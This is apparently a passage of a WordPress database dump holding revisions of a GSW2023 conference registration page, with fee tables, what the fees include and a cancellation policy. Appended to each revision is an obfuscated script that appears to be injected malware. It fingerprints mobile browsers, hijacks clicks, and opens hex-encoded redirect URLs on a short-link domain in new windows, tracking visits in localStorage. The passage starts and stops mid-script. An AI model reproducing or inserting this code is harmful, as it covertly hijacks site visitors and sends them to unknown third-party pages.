_0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Registration','','inherit','closed','closed','','2638-revision-v1','','','2022-10-09 01:12:27','2022-10-09 01:12:27','',2638,'https://gsw2023.com/?p=2647',0,'revision','',0),
(2648,1,'2022-10-09 01:14:11','2022-10-09 01:14:11','[vc_row][vc_column][bsf-info-box icon_size=\"32\"]\r\n<h2><strong><span style=\"font-size: 14px;\">THE REGISTRATION FORM WILL Be OPEN Soon IN CONFTOOL</span></strong></h2>\r\n<div class=\"three_quarter first\"><section class=\"clear\">\r\n<h4>The registration fees vary according to the number of days participants want to attend. There are no limitations in the number of parallel workshops that participants can attend in the same day.</h4>\r\n&nbsp;\r\n\r\n</section></div>\r\n<h1>REGISTRATION FEES</h1>\r\n[/bsf-info-box][ultimate_info_table color_scheme=\"blue\" package_heading=\"REGISTRATION FEES\" heading_tag=\"h1\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td rowspan=\"2\"></td>\r\n<td colspan=\"3\"><strong>Standard</strong></td>\r\n<td colspan=\"3\"><strong>Student/Senior</strong></td>\r\n<td colspan=\"3\"><strong>Accompanying person</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Early bird</td>\r\n<td>Late</td>\r\n<td>On Site</td>\r\n<td>Early bird</td>\r\n<td>Late</td>\r\n<td>On Site</td>\r\n<td>Early bird</td>\r\n<td>Late</td>\r\n<td>On Site</td>\r\n</tr>\r\n<tr>\r\n<td>1 Day</td>\r\n<td>$250</td>\r\n<td>$300</td>\r\n<td>$350</td>\r\n<td>$150</td>\r\n<td>$200</td>\r\n<td> $250</td>\r\n<td>$100</td>\r\n<td>$100</td>\r\n<td>$125</td>\r\n</tr>\r\n<tr>\r\n<td>2 Days</td>\r\n<td> $350</td>\r\n<td>$400</td>\r\n<td>$450</td>\r\n<td> $200</td>\r\n<td>$250</td>\r\n<td>$300</td>\r\n<td>$125</td>\r\n<td>$125</td>\r\n<td>$150</td>\r\n</tr>\r\n<tr>\r\n<td>3 Days</td>\r\n<td> $450</td>\r\n<td>$500</td>\r\n<td>$550</td>\r\n<td> $250</td>\r\n<td>$300</td>\r\n<td>$350</td>\r\n<td>$150</td>\r\n<td>$150</td>\r\n<td>$175</td>\r\n</tr>\r\n<tr>\r\n<td>4 Days</td>\r\n<td>$550</td>\r\n<td>$600</td>\r\n<td>$650</td>\r\n<td>$300</td>\r\n<td> $350</td>\r\n<td>$400</td>\r\n<td>$175</td>\r\n<td>$175</td>\r\n<td>$200</td>\r\n</tr>\r\n<tr>\r\n<td>5 Days</td>\r\n<td> $650</td>\r\n<td>$700</td>\r\n<td>$750</td>\r\n<td>$350</td>\r\n<td>$400</td>\r\n<td>$450</td>\r\n<td>$200</td>\r\n<td>$200</td>\r\n<td>$225</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/ultimate_info_table][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','Registration','','inherit','closed','closed','','2638-revision-v1','','','2022-10-09 01:14:11','2022-10-09 01:14:11','',2638,'https://gsw2023.com/?p=2648',0,'revision','',0),
(2649,1,'2022-10-09 01:16:05','2022-10-09 01:16:05','[vc_row][vc_column][bsf-info-box icon_size=\"32\"]\r\n<h2><strong><span style=\"font-size: 14px;\">THE REGISTRATION FORM WILL Be OPEN Soon IN CONFTOOL</span></strong></h2>\r\n<div class=\"three_quarter first\"><section class=\"clear\">\r\n<h4>The registration fees vary according to the number of days participants want to attend. There are no limitations in the number of parallel workshops that participants can attend in the same day.</h4>\r\n</section></div>\r\n[/bsf-info-box][ultimate_info_table color_scheme=\"blue\" package_heading=\"REGISTRATION FEES\" heading_tag=\"h1\"]\r\n<table>\r\n<tbody>\r\n<tr>\r\n<td rowspan=\"2\"></td>\r\n<td colspan=\"3\"><strong>Standard</strong></td>\r\n<td colspan=\"3\"><strong>Student/Senior</strong></td>\r\n<td colspan=\"3\"><strong>Accompanying person</strong></td>\r\n</tr>\r\n<tr>\r\n<td>Early bird</td>\r\n<td>Late</td>\r\n<td>On Site</td>\r\n<td>Early bird</td>\r\n<td>Late</td>\r\n<td>On Site</td>\r\n<td>Early bird</td>\r\n<td>Late</td>\r\n<td>On Site</td>\r\n</tr>\r\n<tr>\r\n<td>1 Day</td>\r\n<td>$250</td>\r\n<td>$300</td>\r\n<td>$350</td>\r\n<td>$150</td>\r\n<td>$200</td>\r\n<td> $250</td>\r\n<td>$100</td>\r\n<td>$100</td>\r\n<td>$125</td>\r\n</tr>\r\n<tr>\r\n<td>2 Days</td>\r\n<td> $350</td>\r\n<td>$400</td>\r\n<td>$450</td>\r\n<td> $200</td>\r\n<td>$250</td>\r\n<td>$300</td>\r\n<td>$125</td>\r\n<td>$125</td>\r\n<td>$150</td>\r\n</tr>\r\n<tr>\r\n<td>3 Days</td>\r\n<td> $450</td>\r\n<td>$500</td>\r\n<td>$550</td>\r\n<td> $250</td>\r\n<td>$300</td>\r\n<td>$350</td>\r\n<td>$150</td>\r\n<td>$150</td>\r\n<td>$175</td>\r\n</tr>\r\n<tr>\r\n<td>4 Days</td>\r\n<td>$550</td>\r\n<td>$600</td>\r\n<td>$650</td>\r\n<td>$300</td>\r\n<td> $350</td>\r\n<td>$400</td>\r\n<td>$175</td>\r\n<td>$175</td>\r\n<td>$200</td>\r\n</tr>\r\n<tr>\r\n<td>5 Days</td>\r\n<td> $650</td>\r\n<td>$700</td>\r\n<td>$750</td>\r\n<td>$350</td>\r\n<td>$400</td>\r\n<td>$450</td>\r\n<td>$200</td>\r\n<td>$200</td>\r\n<td>$225</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n[/ultimate_info_table][bsf-info-box icon_size=\"32\"]\r\n<h2>Any Registration Allows A Participant To Present One Paper Accepted For Publication. A Participant Can Only Have One Registration!</h2>\r\no Standard and student / senior (over 65) registration fees include:\r\n<ul class=\"nospace\">\r\n 	<li>Entry to all sessions/workshops;</li>\r\n 	<li>Entry to the Exhibition;</li>\r\n 	<li>Copy of Final Programme;</li>\r\n 	<li>Morning and Afternoon Tea/Coffee breaks;</li>\r\n 	<li>Lunches;</li>\r\n 	<li>Attendance at Welcome Reception;</li>\r\n 	<li>Attendance at Exhibitors Reception;</li>\r\n</ul>\r\no Accompanying person fee includes:\r\n<ul>\r\n 	<li>Entry to Opening Session;</li>\r\n 	<li>Attendance at Welcome Reception;</li>\r\n 	<li>Attendance at Exhibitors Reception;</li>\r\n 	<li>Morning and Afternoon Tea/Coffee breaks;</li>\r\n</ul>\r\no Cancellation policy:\r\n<ul>\r\n 	<li>Cancellations are accepted by e-mail to the secretariat of GSW2023 The registration fee will be refunded for 80% for cancellations received no later than June 1st, 2023. No refunds after this date, but replacement is allowed.</li>\r\n</ul>\r\n<h1>---Two Social Dinners Will Be Organized On Tuesday And Thursday.</h1>\r\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return 